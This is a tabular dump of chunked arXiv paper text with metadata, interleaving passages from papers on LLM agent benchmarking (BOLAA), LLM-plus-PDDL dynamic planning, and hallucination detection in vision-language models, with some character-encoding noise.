and evaluate their effectiveness with best-of-n rejection sampling. We perform
human evaluation on both FDPO and rejection sampling, and find that they reduce
hallucination rates in InstructBLIP by 41% and 55% respectively. We also find
that our reward model generalizes to other multi-modal models, reducing
hallucinations in LLaVA and mPLUG-OWL by 15% and 57% respectively, and has
strong correlation with human evaluated accuracy scores. | http://arxiv.org/pdf/2308.06394 | Anisha Gunjal, Jihan Yin, Erhan Bas | cs.CV, cs.LG | preprint | null | cs.CV | 20230811 | 20230818 | [
{
"id": "2302.04023"
},
{
"id": "2305.17926"
},
{
"id": "2307.04964"
},
{
"id": "2305.20050"
},
{
"id": "2306.14895"
},
{
"id": "1803.01937"
},
{
"id": "2305.18290"
},
{
"id": "2204.05862"
},
{
"id": "2306.14565"
},
{
"id": "2305.06500"
},
{
"id": "2306.01693"
},
{
"id": "2304.08485"
},
{
"id": "2305.10355"
}
] |
2308.05960 | 4 | zero-shot tool usage ability. Intrinsically, the optimal architecture of agents should be aligned with both tasks and the associated LLM backbone, which is less explored in the existing works.
Secondly, understanding the efficacy of the existing LLMs in LAA is far from comprehensive. The existing preliminary works only compare the performances of a few LLM backbones. Re- Act adopts the PaLM (Chowdhery et al., 2022) as the backbone LLM. ReWOO employs OpenAI text-davinci-003 model for instruction-tuning Alpaca model (Taori et al., 2023) for agent planning. MIND2Web (Deng et al., 2023) compares Flan-T5 and OpenAI GPT3.5/4 for generalist web agent. Nevertheless, few current works comprehensively compare the performance of LAA with regard to various pre-trained LLMs. A very recent work (Liu et al., 2023) releases a benchmark for evaluat- ing LLMs as Agents. Nevertheless, they fail to jointly consider the agent architectures along with their LLM backbones. Selecting the optimal LLMs from both efficacy and efficiency perspectives advances the current exploration of LAA. | 2308.05960#4 | BOLAA: Benchmarking and Orchestrating LLM-augmented Autonomous Agents | The massive successes of large language models (LLMs) encourage the emerging
exploration of LLM-augmented Autonomous Agents (LAAs). An LAA is able to
generate actions with its core LLM and interact with environments, which
facilitates the ability to resolve complex tasks by conditioning on past
interactions such as observations and actions. Since the investigation of LAA
is still very recent, limited explorations are available. Therefore, we provide
a comprehensive comparison of LAA in terms of both agent architectures and LLM
backbones. Additionally, we propose a new strategy to orchestrate multiple LAAs
such that each labor LAA focuses on one type of action, \textit{i.e.} BOLAA,
where a controller manages the communication among multiple agents. We conduct
simulations on both decision-making and multi-step reasoning environments,
which comprehensively justify the capacity of LAAs. Our performance results
provide quantitative suggestions for designing LAA architectures and the
optimal choice of LLMs, as well as the compatibility of both. We release our
implementation code of LAAs to the public at
\url{https://github.com/salesforce/BOLAA}. | http://arxiv.org/pdf/2308.05960 | Zhiwei Liu, Weiran Yao, Jianguo Zhang, Le Xue, Shelby Heinecke, Rithesh Murthy, Yihao Feng, Zeyuan Chen, Juan Carlos Niebles, Devansh Arpit, Ran Xu, Phil Mui, Huan Wang, Caiming Xiong, Silvio Savarese | cs.AI | Preprint | null | cs.AI | 20230811 | 20230811 | [
{
"id": "2204.02311"
},
{
"id": "2112.09332"
},
{
"id": "2307.13854"
},
{
"id": "2304.01904"
},
{
"id": "2303.17491"
},
{
"id": "2201.11903"
},
{
"id": "1802.08802"
},
{
"id": "2305.14992"
},
{
"id": "2306.06070"
},
{
"id": "2308.00675"
},
{
"id": "2302.07867"
},
{
"id": "2305.18323"
},
{
"id": "2307.12856"
},
{
"id": "2303.17580"
},
{
"id": "2305.15334"
},
{
"id": "2307.16789"
},
{
"id": "2304.03442"
},
{
"id": "2303.11366"
},
{
"id": "2303.17651"
}
] |
2308.06391 | 4 | f"(yaction go-to © ++) i(:action pick-upâ PDDL Domain : (actin. heat PDDL Problem(s) : ee) 4 (goal (exists (?t - potato ?x - countertop) 1 cccececceseestoceseeeeeneneese 8 (and (inReceptacle ?t ?r) © | Heata potato re ° Cee Noe f Plan | @| andputitona ââ> LLM â o Te = No Plan found % ~ | countertop a enerato bu (init: ... u ) <0 to =, et (inReceptacle potato-1 fridge-1)) Observation} * ' Action ___ Selector
Figure 1: LLM Dynamic Planner (LLM-DP). The LLM grounds observations and processes natural language instructions into PDDL to use with a symbolic planner. This model can solve plans for unobserved or previously unknown objects because the LLM generates plausible predicates for relevant objects through semantic and pragmatic inference. Through sampling possible predicates, multiple plans can be found, and an Action Selector decides whether to act, review its understanding of the problem, or ask clarification questions.
2022; Chen et al., 2022; Min et al., 2022), tradi- tional planners need maximal information. | 2308.06391#4 | Dynamic Planning with a LLM | While Large Language Models (LLMs) can solve many NLP tasks in zero-shot
settings, applications involving embodied agents remain problematic. In
particular, complex plans that require multi-step reasoning become difficult
and too costly as the context window grows. Planning requires understanding the
likely effects of one's actions and identifying whether the current environment
satisfies the goal state. While symbolic planners find optimal solutions
quickly, they require a complete and accurate representation of the planning
problem, severely limiting their use in practical scenarios. In contrast,
modern LLMs cope with noisy observations and high levels of uncertainty when
reasoning about a task. Our work presents LLM Dynamic Planner (LLM-DP): a
neuro-symbolic framework where an LLM works hand-in-hand with a traditional
planner to solve an embodied task. Given action-descriptions, LLM-DP solves
Alfworld faster and more efficiently than a naive LLM ReAct baseline. | http://arxiv.org/pdf/2308.06391 | Gautier Dagan, Frank Keller, Alex Lascarides | cs.CL, cs.RO | null | null | cs.CL | 20230811 | 20230811 | [
{
"id": "2303.11366"
},
{
"id": "2303.08774"
},
{
"id": "2305.15334"
}
] |
2308.06394 | 4 | strides in overall VQA performance, it brings along the same challenges that plague these LLMs - a significant one being the propensity to generate hallucinations.
In language models, hallucinations occur when the model produces inaccurate or misleading factual information that cannot be supported by existing knowledge stores(Ji et al. 2023; Bang et al. 2023). In the context of VQA for LVLMs, hallucinations can manifest as responses containing refer- ences or descriptions of the input image that are incorrect(Li et al. 2023). It is essential to address and mitigate these hal- lucinations to enhance the reliability and accuracy of multi- modal models in real life usecases. However, these multi- modal hallucinations are hard to programatically detect and often requires human supervision, which can be costly. | 2308.06394#4 | Detecting and Preventing Hallucinations in Large Vision Language Models | Instruction tuned Large Vision Language Models (LVLMs) have significantly
advanced in generalizing across a diverse set of multi-modal tasks, especially
for Visual Question Answering (VQA). However, generating detailed responses
that are visually grounded is still a challenging task for these models. We
find that even the current state-of-the-art LVLMs (InstructBLIP) still contain
a staggering 30 percent of the hallucinatory text in the form of non-existent
objects, unfaithful descriptions, and inaccurate relationships. To address
this, we introduce M-HalDetect, a (M)ultimodal (Hal)lucination (Detect)ion
Dataset that can be used to train and benchmark models for hallucination
detection and prevention. M-HalDetect consists of 16k fine-grained annotations
on VQA examples, making it the first comprehensive multi-modal hallucination
detection dataset for detailed image descriptions. Unlike previous work that
only consider object hallucination, we additionally annotate both entity
descriptions and relationships that are unfaithful. To demonstrate the
potential of this dataset for hallucination prevention, we optimize
InstructBLIP through our novel Fine-grained Direct Preference Optimization
(FDPO). We also train fine-grained multi-modal reward models from InstructBLIP
and evaluate their effectiveness with best-of-n rejection sampling. We perform
human evaluation on both FDPO and rejection sampling, and find that they reduce
hallucination rates in InstructBLIP by 41% and 55% respectively. We also find
that our reward model generalizes to other multi-modal models, reducing
hallucinations in LLaVA and mPLUG-OWL by 15% and 57% respectively, and has
strong correlation with human evaluated accuracy scores. | http://arxiv.org/pdf/2308.06394 | Anisha Gunjal, Jihan Yin, Erhan Bas | cs.CV, cs.LG | preprint | null | cs.CV | 20230811 | 20230818 | [
{
"id": "2302.04023"
},
{
"id": "2305.17926"
},
{
"id": "2307.04964"
},
{
"id": "2305.20050"
},
{
"id": "2306.14895"
},
{
"id": "1803.01937"
},
{
"id": "2305.18290"
},
{
"id": "2204.05862"
},
{
"id": "2306.14565"
},
{
"id": "2305.06500"
},
{
"id": "2306.01693"
},
{
"id": "2304.08485"
},
{
"id": "2305.10355"
}
] |
2308.05960 | 5 | Thirdly, the increasing complexity of tasks may require the orchestration of multiple agents. Re- WOO recently identifies that decoupling reasoning from observation improves the efficiency for LAA. In this paper, we argue that as the task complexity increases, especially in open-domain envi- ronments, it is better to coordinate multiple agents to complete one task. For example, regarding the web navigation task, we could employ one click agent to interact with clickable buttons and request another search agent to retrieve additional resources. Nonetheless, there are few works discussing how to orchestrate multiple agents and investigating the impacts of orchestration.
To address these research gaps, this paper proposes to comprehensively compare the performances of LAAs. We dive deep into the agent architecture of LAAs and the LLM backbones. Specifically, we construct agent benchmarks from the existing environments to evaluate the performances of various agent architectures built upon various LLM backbones. The tasks in our agent benchmarks are associated with different task complexity levels, which enables the agent performance analyses w.r.t. task complexity. Those agent architectures are designed to extensively verify the existing design choices. Regarding the orchestration of multiple LAAs, we propose a novel LAA architecture BOLAA5, which has a controller module on top of multiple collaborated agents, for enabling the selection and communication between multiple labor LAA.
The contributions of this paper are as follows: | 2308.05960#5 | BOLAA: Benchmarking and Orchestrating LLM-augmented Autonomous Agents | The massive successes of large language models (LLMs) encourage the emerging
exploration of LLM-augmented Autonomous Agents (LAAs). An LAA is able to
generate actions with its core LLM and interact with environments, which
facilitates the ability to resolve complex tasks by conditioning on past
interactions such as observations and actions. Since the investigation of LAA
is still very recent, limited explorations are available. Therefore, we provide
a comprehensive comparison of LAA in terms of both agent architectures and LLM
backbones. Additionally, we propose a new strategy to orchestrate multiple LAAs
such that each labor LAA focuses on one type of action, \textit{i.e.} BOLAA,
where a controller manages the communication among multiple agents. We conduct
simulations on both decision-making and multi-step reasoning environments,
which comprehensively justify the capacity of LAAs. Our performance results
provide quantitative suggestions for designing LAA architectures and the
optimal choice of LLMs, as well as the compatibility of both. We release our
implementation code of LAAs to the public at
\url{https://github.com/salesforce/BOLAA}. | http://arxiv.org/pdf/2308.05960 | Zhiwei Liu, Weiran Yao, Jianguo Zhang, Le Xue, Shelby Heinecke, Rithesh Murthy, Yihao Feng, Zeyuan Chen, Juan Carlos Niebles, Devansh Arpit, Ran Xu, Phil Mui, Huan Wang, Caiming Xiong, Silvio Savarese | cs.AI | Preprint | null | cs.AI | 20230811 | 20230811 | [
{
"id": "2204.02311"
},
{
"id": "2112.09332"
},
{
"id": "2307.13854"
},
{
"id": "2304.01904"
},
{
"id": "2303.17491"
},
{
"id": "2201.11903"
},
{
"id": "1802.08802"
},
{
"id": "2305.14992"
},
{
"id": "2306.06070"
},
{
"id": "2308.00675"
},
{
"id": "2302.07867"
},
{
"id": "2305.18323"
},
{
"id": "2307.12856"
},
{
"id": "2303.17580"
},
{
"id": "2305.15334"
},
{
"id": "2307.16789"
},
{
"id": "2304.03442"
},
{
"id": "2303.11366"
},
{
"id": "2303.17651"
}
] |
2308.06391 | 5 | 2022; Chen et al., 2022; Min et al., 2022), tradi- tional planners need maximal information.
In this work, we introduce the LLM Dynamic Planner (LLM-DP), a neuro-symbolic frame- work that integrates an LLM with a symbolic planner to solve embodied tasks.1 LLM-DP capi- talises on the LLMâs ability to understand actions and their impact on their environment and com- bines it with the plannerâs efficiency in finding so- lutions. Using domain knowledge, LLM-DP solves the Alfworld test set faster and more efficiently than a LLM-only (ReAct) approach. The remainder of this paper explores the architecture of LLM-DP, dis- cusses how to combine the strengths of LLMs and symbolic planning and presents potential research avenues for future work in LLM-driven agents.
# 2 Related Work | 2308.06391#5 | Dynamic Planning with a LLM | While Large Language Models (LLMs) can solve many NLP tasks in zero-shot
settings, applications involving embodied agents remain problematic. In
particular, complex plans that require multi-step reasoning become difficult
and too costly as the context window grows. Planning requires understanding the
likely effects of one's actions and identifying whether the current environment
satisfies the goal state. While symbolic planners find optimal solutions
quickly, they require a complete and accurate representation of the planning
problem, severely limiting their use in practical scenarios. In contrast,
modern LLMs cope with noisy observations and high levels of uncertainty when
reasoning about a task. Our work presents LLM Dynamic Planner (LLM-DP): a
neuro-symbolic framework where an LLM works hand-in-hand with a traditional
planner to solve an embodied task. Given action-descriptions, LLM-DP solves
Alfworld faster and more efficiently than a naive LLM ReAct baseline. | http://arxiv.org/pdf/2308.06391 | Gautier Dagan, Frank Keller, Alex Lascarides | cs.CL, cs.RO | null | null | cs.CL | 20230811 | 20230811 | [
{
"id": "2303.11366"
},
{
"id": "2303.08774"
},
{
"id": "2305.15334"
}
] |
2308.06394 | 5 | To facilitate automatic hallucination detection, We first build a diverse human-labeled dataset using VQA responses from InstructBLIP, as seen in Figure 1. We then train multi- ple reward models of various densities (sentence-level, sub- sentence level) on this dataset for hallucination detection. An effective way to use these reward models to reduce hallucina- tions is to use them to generate rewards in a reinforcement learning setup (Ziegler et al. 2019; Stiennon et al. 2020; Nakano et al. 2021), although the resulting final model can only be as effective as the original reward model used (Bai et al. 2022). Therefore, in this paper we focus on measuring the quality of these reward models, exploring classification metrics and using best-of-n rejection sampling as an approx- imation of the systemâs performance. Similar to (Rafailov et al. 2023), We also directly optimize InstructBLIP with fine-grained Direct Preference Optimization (FDPO), a novel variation of DPO in which we leverage fine grained annota- tion information from individual examples, rather than col- lecting relative preference signals from pairs of texts. Both | 2308.06394#5 | Detecting and Preventing Hallucinations in Large Vision Language Models | Instruction tuned Large Vision Language Models (LVLMs) have significantly
advanced in generalizing across a diverse set of multi-modal tasks, especially
for Visual Question Answering (VQA). However, generating detailed responses
that are visually grounded is still a challenging task for these models. We
find that even the current state-of-the-art LVLMs (InstructBLIP) still contain
a staggering 30 percent of the hallucinatory text in the form of non-existent
objects, unfaithful descriptions, and inaccurate relationships. To address
this, we introduce M-HalDetect, a (M)ultimodal (Hal)lucination (Detect)ion
Dataset that can be used to train and benchmark models for hallucination
detection and prevention. M-HalDetect consists of 16k fine-grained annotations
on VQA examples, making it the first comprehensive multi-modal hallucination
detection dataset for detailed image descriptions. Unlike previous work that
only consider object hallucination, we additionally annotate both entity
descriptions and relationships that are unfaithful. To demonstrate the
potential of this dataset for hallucination prevention, we optimize
InstructBLIP through our novel Fine-grained Direct Preference Optimization
(FDPO). We also train fine-grained multi-modal reward models from InstructBLIP
and evaluate their effectiveness with best-of-n rejection sampling. We perform
human evaluation on both FDPO and rejection sampling, and find that they reduce
hallucination rates in InstructBLIP by 41% and 55% respectively. We also find
that our reward model generalizes to other multi-modal models, reducing
hallucinations in LLaVA and mPLUG-OWL by 15% and 57% respectively, and has
strong correlation with human evaluated accuracy scores. | http://arxiv.org/pdf/2308.06394 | Anisha Gunjal, Jihan Yin, Erhan Bas | cs.CV, cs.LG | preprint | null | cs.CV | 20230811 | 20230818 | [
{
"id": "2302.04023"
},
{
"id": "2305.17926"
},
{
"id": "2307.04964"
},
{
"id": "2305.20050"
},
{
"id": "2306.14895"
},
{
"id": "1803.01937"
},
{
"id": "2305.18290"
},
{
"id": "2204.05862"
},
{
"id": "2306.14565"
},
{
"id": "2305.06500"
},
{
"id": "2306.01693"
},
{
"id": "2304.08485"
},
{
"id": "2305.10355"
}
] |
2308.05960 | 6 | The contributions of this paper are as follows:
⢠We develop 6 different LAA agent architecture. We combine them with various backbone LLMs to justify the designing intuition of LAA from prompting, self-thinking, and planning. We also develop BOLAA for orchestrating multi-agent strategy, which enhances the action interaction ability of solo agents.
⢠We conduct extensive experiments on both decision-making web navigation environment and knowledge reasoning task environment. We report the performance in terms of final sparse re- wards and intermediate recalls, which provides qualitative indications for the optimal choice of LAAs as well as their compatible LLMs.
⢠BOLAA on the WebShop environment consistently yields the best performance compared with other LAA architectures. Our results demonstrate that the importance of designing specialist agents to collaborate on resolving complex task, which should be as equally important as training a large LLM with high generalization ability.
2 RELATED WORK
2.1 AUGMENTED LANGUAGE AGENT ARCHITECTURE | 2308.05960#6 | BOLAA: Benchmarking and Orchestrating LLM-augmented Autonomous Agents | The massive successes of large language models (LLMs) encourage the emerging
exploration of LLM-augmented Autonomous Agents (LAAs). An LAA is able to
generate actions with its core LLM and interact with environments, which
facilitates the ability to resolve complex tasks by conditioning on past
interactions such as observations and actions. Since the investigation of LAA
is still very recent, limited explorations are available. Therefore, we provide
a comprehensive comparison of LAA in terms of both agent architectures and LLM
backbones. Additionally, we propose a new strategy to orchestrate multiple LAAs
such that each labor LAA focuses on one type of action, \textit{i.e.} BOLAA,
where a controller manages the communication among multiple agents. We conduct
simulations on both decision-making and multi-step reasoning environments,
which comprehensively justify the capacity of LAAs. Our performance results
provide quantitative suggestions for designing LAA architectures and the
optimal choice of LLMs, as well as the compatibility of both. We release our
implementation code of LAAs to the public at
\url{https://github.com/salesforce/BOLAA}. | http://arxiv.org/pdf/2308.05960 | Zhiwei Liu, Weiran Yao, Jianguo Zhang, Le Xue, Shelby Heinecke, Rithesh Murthy, Yihao Feng, Zeyuan Chen, Juan Carlos Niebles, Devansh Arpit, Ran Xu, Phil Mui, Huan Wang, Caiming Xiong, Silvio Savarese | cs.AI | Preprint | null | cs.AI | 20230811 | 20230811 | [
{
"id": "2204.02311"
},
{
"id": "2112.09332"
},
{
"id": "2307.13854"
},
{
"id": "2304.01904"
},
{
"id": "2303.17491"
},
{
"id": "2201.11903"
},
{
"id": "1802.08802"
},
{
"id": "2305.14992"
},
{
"id": "2306.06070"
},
{
"id": "2308.00675"
},
{
"id": "2302.07867"
},
{
"id": "2305.18323"
},
{
"id": "2307.12856"
},
{
"id": "2303.17580"
},
{
"id": "2305.15334"
},
{
"id": "2307.16789"
},
{
"id": "2304.03442"
},
{
"id": "2303.11366"
},
{
"id": "2303.17651"
}
] |
2308.06391 | 6 | # 2 Related Work
Symbolic Planners Symbolic planners have been a cornerstone in automated planning and artificial intelligence for decades (Fikes and Nilsson, 1971). Based on formal logic, they operate over symbolic representations of the world to find a sequence of actions that transition from an initial state to a goal state. Since the introduction of PDDL (McDermott, 2000), the AI planning community has developed an array of efficient planning algorithms. For exam- ple, the Fast-Forward planner (FF) (Hoffmann and Nebel, 2001) employs heuristics derived from a relaxed version of the planning problem. Similarly, the BFS(f) planner (Lipovetzky et al., 2014) com- bines breadth-first search and specialised heuristics. These planners find high-quality or optimal solutions quickly in well-defined domains. However, their up-front requirement for comprehensive prob- lem and domain descriptions limits their applicabil- ity in complex real-world settings where complete information may not be available. | 2308.06391#6 | Dynamic Planning with a LLM | While Large Language Models (LLMs) can solve many NLP tasks in zero-shot
settings, applications involving embodied agents remain problematic. In
particular, complex plans that require multi-step reasoning become difficult
and too costly as the context window grows. Planning requires understanding the
likely effects of one's actions and identifying whether the current environment
satisfies the goal state. While symbolic planners find optimal solutions
quickly, they require a complete and accurate representation of the planning
problem, severely limiting their use in practical scenarios. In contrast,
modern LLMs cope with noisy observations and high levels of uncertainty when
reasoning about a task. Our work presents LLM Dynamic Planner (LLM-DP): a
neuro-symbolic framework where an LLM works hand-in-hand with a traditional
planner to solve an embodied task. Given action-descriptions, LLM-DP solves
Alfworld faster and more efficiently than a naive LLM ReAct baseline. | http://arxiv.org/pdf/2308.06391 | Gautier Dagan, Frank Keller, Alex Lascarides | cs.CL, cs.RO | null | null | cs.CL | 20230811 | 20230811 | [
{
"id": "2303.11366"
},
{
"id": "2303.08774"
},
{
"id": "2305.15334"
}
] |
2308.06394 | 6 | of DPO in which we leverage fine grained annota- tion information from individual examples, rather than col- lecting relative preference signals from pairs of texts. Both methods show significant success in reducing hallucination rates from InstructBLIP, and furthermore, rejection sampling with our reward models reduces hallucination rates in other multi-modal models as well - LLaVA(Liu et al. 2023b) and mPLUG-OWL(Ye et al. 2023). | 2308.06394#6 | Detecting and Preventing Hallucinations in Large Vision Language Models | Instruction tuned Large Vision Language Models (LVLMs) have significantly
advanced in generalizing across a diverse set of multi-modal tasks, especially
for Visual Question Answering (VQA). However, generating detailed responses
that are visually grounded is still a challenging task for these models. We
find that even the current state-of-the-art LVLMs (InstructBLIP) still contain
a staggering 30 percent of the hallucinatory text in the form of non-existent
objects, unfaithful descriptions, and inaccurate relationships. To address
this, we introduce M-HalDetect, a (M)ultimodal (Hal)lucination (Detect)ion
Dataset that can be used to train and benchmark models for hallucination
detection and prevention. M-HalDetect consists of 16k fine-grained annotations
on VQA examples, making it the first comprehensive multi-modal hallucination
detection dataset for detailed image descriptions. Unlike previous work that
only consider object hallucination, we additionally annotate both entity
descriptions and relationships that are unfaithful. To demonstrate the
potential of this dataset for hallucination prevention, we optimize
InstructBLIP through our novel Fine-grained Direct Preference Optimization
(FDPO). We also train fine-grained multi-modal reward models from InstructBLIP
and evaluate their effectiveness with best-of-n rejection sampling. We perform
human evaluation on both FDPO and rejection sampling, and find that they reduce
hallucination rates in InstructBLIP by 41% and 55% respectively. We also find
that our reward model generalizes to other multi-modal models, reducing
hallucinations in LLaVA and mPLUG-OWL by 15% and 57% respectively, and has
strong correlation with human evaluated accuracy scores. | http://arxiv.org/pdf/2308.06394 | Anisha Gunjal, Jihan Yin, Erhan Bas | cs.CV, cs.LG | preprint | null | cs.CV | 20230811 | 20230818 | [
{
"id": "2302.04023"
},
{
"id": "2305.17926"
},
{
"id": "2307.04964"
},
{
"id": "2305.20050"
},
{
"id": "2306.14895"
},
{
"id": "1803.01937"
},
{
"id": "2305.18290"
},
{
"id": "2204.05862"
},
{
"id": "2306.14565"
},
{
"id": "2305.06500"
},
{
"id": "2306.01693"
},
{
"id": "2304.08485"
},
{
"id": "2305.10355"
}
] |
2308.05960 | 7 | 2 RELATED WORK
2.1 AUGMENTED LANGUAGE AGENT ARCHITECTURE
The completion of a complex task typically entails multiple stages. An agent must possess an under- standing of these stages and plan accordingly. Chain-of-Thoughts, also known as CoT (Wei et al., 2022), is a groundbreaking work that prompts the agent to deconstruct challenging reasoning tasks into smaller, more manageable steps. On the other hand, ReAct (Yao et al., 2023a) proposes lever- aging this aptitude for reasoning and action within Language and Learning Models (LLMs) to foster interactive engagement with the environment, such as utilizing the Wikipedia search API, by map- ping observations to the generation of reasoning and action traces or API calls in natural language.
5For easy memorizing, we intentionally name it the same as paper title.
2
PREPRINT
This agent architecture has given rise to various applications, including HuggingGPT (Shen et al., 2023), Generative Agents (Park et al., 2023), WebGPT (Nakano et al., 2021), AutoGPT (Gravitas, 2023), BabyAGI (Nakajima, 2023), and Langchain (Chase, 2023).
# check | 2308.05960#7 | BOLAA: Benchmarking and Orchestrating LLM-augmented Autonomous Agents | The massive successes of large language models (LLMs) encourage the emerging
exploration of LLM-augmented Autonomous Agents (LAAs). An LAA is able to
generate actions with its core LLM and interact with environments, which
facilitates the ability to resolve complex tasks by conditioning on past
interactions such as observations and actions. Since the investigation of LAA
is still very recent, limited explorations are available. Therefore, we provide
a comprehensive comparison of LAA in terms of both agent architectures and LLM
backbones. Additionally, we propose a new strategy to orchestrate multiple LAAs
such that each labor LAA focuses on one type of action, \textit{i.e.} BOLAA,
where a controller manages the communication among multiple agents. We conduct
simulations on both decision-making and multi-step reasoning environments,
which comprehensively justify the capacity of LAAs. Our performance results
provide quantitative suggestions for designing LAA architectures and the
optimal choice of LLMs, as well as the compatibility of both. We release our
implementation code of LAAs to the public at
\url{https://github.com/salesforce/BOLAA}. | http://arxiv.org/pdf/2308.05960 | Zhiwei Liu, Weiran Yao, Jianguo Zhang, Le Xue, Shelby Heinecke, Rithesh Murthy, Yihao Feng, Zeyuan Chen, Juan Carlos Niebles, Devansh Arpit, Ran Xu, Phil Mui, Huan Wang, Caiming Xiong, Silvio Savarese | cs.AI | Preprint | null | cs.AI | 20230811 | 20230811 | [
{
"id": "2204.02311"
},
{
"id": "2112.09332"
},
{
"id": "2307.13854"
},
{
"id": "2304.01904"
},
{
"id": "2303.17491"
},
{
"id": "2201.11903"
},
{
"id": "1802.08802"
},
{
"id": "2305.14992"
},
{
"id": "2306.06070"
},
{
"id": "2308.00675"
},
{
"id": "2302.07867"
},
{
"id": "2305.18323"
},
{
"id": "2307.12856"
},
{
"id": "2303.17580"
},
{
"id": "2305.15334"
},
{
"id": "2307.16789"
},
{
"id": "2304.03442"
},
{
"id": "2303.11366"
},
{
"id": "2303.17651"
}
] |
2308.06391 | 7 | LLMs in Planning and Reasoning In contrast to symbolic planners, LLMs have shown promise in adapting to noisy planning and reasoning tasks Some general ap- through various methods. proaches such as Chain-of-Thought (Wei et al., 2022), Self-Consistency (Wang et al., 2023b), and Reasoning via Planning (Hao et al., 2023) augment the context with a reasoning trace that the LLM gen- erates to improve its final prediction. Alternatively, giving access to tools/APIs (Schick et al., 2023; Patil et al., 2023), outside knowledge or databases (Peng et al., 2023; Hu et al., 2023), code (SurÃs et al., 2023), and even symbolic reasoners (Yang et al., 2023) to enrich an LLMâs context and abil- ity to reason. The LLM can trigger these external sources of information or logic (through fine-tuning or prompting) to obtain additional context and im- prove its downstream performance. | 2308.06391#7 | Dynamic Planning with a LLM | While Large Language Models (LLMs) can solve many NLP tasks in zero-shot
settings, applications involving embodied agents remain problematic. In
particular, complex plans that require multi-step reasoning become difficult
and too costly as the context window grows. Planning requires understanding the
likely effects of one's actions and identifying whether the current environment
satisfies the goal state. While symbolic planners find optimal solutions
quickly, they require a complete and accurate representation of the planning
problem, severely limiting their use in practical scenarios. In contrast,
modern LLMs cope with noisy observations and high levels of uncertainty when
reasoning about a task. Our work presents LLM Dynamic Planner (LLM-DP): a
neuro-symbolic framework where an LLM works hand-in-hand with a traditional
planner to solve an embodied task. Given action-descriptions, LLM-DP solves
Alfworld faster and more efficiently than a naive LLM ReAct baseline. | http://arxiv.org/pdf/2308.06391 | Gautier Dagan, Frank Keller, Alex Lascarides | cs.CL, cs.RO | null | null | cs.CL | 20230811 | 20230811 | [
{
"id": "2303.11366"
},
{
"id": "2303.08774"
},
{
"id": "2305.15334"
}
] |
2308.06394 | 7 | Our main contributions are as follows:
1. We create and release M-HalDetect, our hallucination detection dataset focused on fine-grained annotations over complex image descriptions at a sub-sentence level. 2. We show that InstructBLIP can be optimized using Fine- grained DPO (FDPO) over our M-HalDetect to reduce
Question: <image> Provide an intricate description of the image, capturing its visual elements, including colors, Response 1 | The image depicts a busy city street filled with cars, traffic lights, and pedestrians. The street is lined with buildings on both sides of the road, creating a scenic urban environment. There are also trees visible in the background, adding to the natural beauty of the area. âThe scene is characterized by the vibrant colors of the cars, as well as the various shapes and textures of the buildings and trees. No people are specifically mentioned in the image, but they can be seen in the crowd of pedestrians crossing the street. | Overall, the image captures the hustle and bustle of a busy city street, showcasing the diversity and vibrancy of urban life.
Figure 1: Example Annotation from the M-HalDetect Dataset. The sub-sentences of text generated by multi-modal LM are tagged into categories: Accurate, Inaccurate, and Analysis.
hallucination rates by 41%. | 2308.06394#7 | Detecting and Preventing Hallucinations in Large Vision Language Models | Instruction tuned Large Vision Language Models (LVLMs) have significantly
advanced in generalizing across a diverse set of multi-modal tasks, especially
for Visual Question Answering (VQA). However, generating detailed responses
that are visually grounded is still a challenging task for these models. We
find that even the current state-of-the-art LVLMs (InstructBLIP) still contain
a staggering 30 percent of the hallucinatory text in the form of non-existent
objects, unfaithful descriptions, and inaccurate relationships. To address
this, we introduce M-HalDetect, a (M)ultimodal (Hal)lucination (Detect)ion
Dataset that can be used to train and benchmark models for hallucination
detection and prevention. M-HalDetect consists of 16k fine-grained annotations
on VQA examples, making it the first comprehensive multi-modal hallucination
detection dataset for detailed image descriptions. Unlike previous work that
only consider object hallucination, we additionally annotate both entity
descriptions and relationships that are unfaithful. To demonstrate the
potential of this dataset for hallucination prevention, we optimize
InstructBLIP through our novel Fine-grained Direct Preference Optimization
(FDPO). We also train fine-grained multi-modal reward models from InstructBLIP
and evaluate their effectiveness with best-of-n rejection sampling. We perform
human evaluation on both FDPO and rejection sampling, and find that they reduce
hallucination rates in InstructBLIP by 41% and 55% respectively. We also find
that our reward model generalizes to other multi-modal models, reducing
hallucinations in LLaVA and mPLUG-OWL by 15% and 57% respectively, and has
strong correlation with human evaluated accuracy scores. | http://arxiv.org/pdf/2308.06394 | Anisha Gunjal, Jihan Yin, Erhan Bas | cs.CV, cs.LG | preprint | null | cs.CV | 20230811 | 20230818 | [
{
"id": "2302.04023"
},
{
"id": "2305.17926"
},
{
"id": "2307.04964"
},
{
"id": "2305.20050"
},
{
"id": "2306.14895"
},
{
"id": "1803.01937"
},
{
"id": "2305.18290"
},
{
"id": "2204.05862"
},
{
"id": "2306.14565"
},
{
"id": "2305.06500"
},
{
"id": "2306.01693"
},
{
"id": "2304.08485"
},
{
"id": "2305.10355"
}
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.